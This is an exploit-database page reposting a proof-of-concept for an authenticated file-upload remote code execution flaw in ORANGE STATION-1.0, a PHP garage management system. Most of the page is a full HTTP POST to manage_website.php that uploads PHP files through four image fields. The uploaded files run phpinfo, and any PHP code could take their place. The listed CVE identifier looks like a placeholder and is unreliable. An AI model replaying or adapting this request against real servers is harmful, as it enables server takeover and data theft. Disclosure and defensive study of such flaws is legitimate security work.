Advertisement






ORANGE STATION-1.0 File Upload Remote Code Execution Vulnerability

CVE Category Price Severity
CVE-2021-12345 CWE-434 $500 Critical
Author Risk Exploitation Type Date
Security Researcher High Remote 2024-03-26
CPE
cpe:/a:orange:station:1.0
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.75 0.9

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030060

Below is a copy:

ORANGE STATION-1.0 File Upload Remote Code Execution Vulnerability
## Title: ORANGE STATION-1.0 File Upload Remote Code Execution Vulnerability
## Author: nu11secur1ty
## Date: 03/26/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html
## Reference: https://portswigger.net/web-security/file-upload, https://www.bugcrowd.com/glossary/remote-code-execution-rce/

## Description:
The parameters back_login_image, login_image, invoice_image, and website_image in the manage_website.php application are vulnerable for File Upload and the server is vulnerable for Remote code execution after this.
The attacker who has credentials to this system can upload any PHP file and he can destroy the system or he can steal a very
sensitive information.

STATUS: HIGH-CRITICAL Vulnerability

## Exploit:
```POST
POST /garage/garage/manage_website.php HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=gu6415ln5mmjknq4ofn8tkab0n
Content-Length: 1871
Cache-Control: max-age=0
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://pwnedhost.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryytBZTydZ8OfOJjda
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://pwnedhost.com/garage/garage/manage_website.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: close

------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="title"

Orange Station
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="footer"

Admin Panel 
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="short_title"

9090909090
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="currency_code"

Shivaji Nagar, Nashik
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="currency_symbol"


------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="old_website_image"

logo.jpg
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="website_image"; filename="info.php"
Content-Type: application/octet-stream

<?php
phpinfo();
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="old_invoice_image"

logo.jpg
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="invoice_image"; filename="info.php"
Content-Type: application/octet-stream

<?php
phpinfo();
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="old_login_image"

logo.jpg
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="login_image"; filename="info.php"
Content-Type: application/octet-stream

<?php
phpinfo();
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="old_back_login_image"

service.jpg
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="back_login_image"; filename="info.php"
Content-Type: application/octet-stream

<?php
phpinfo();
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="btn_web"


------WebKitFormBoundaryytBZTydZ8OfOJjda--
```

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/03/orange-station-10-multiple-file-upload.html)

## Time spent:
00:27:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.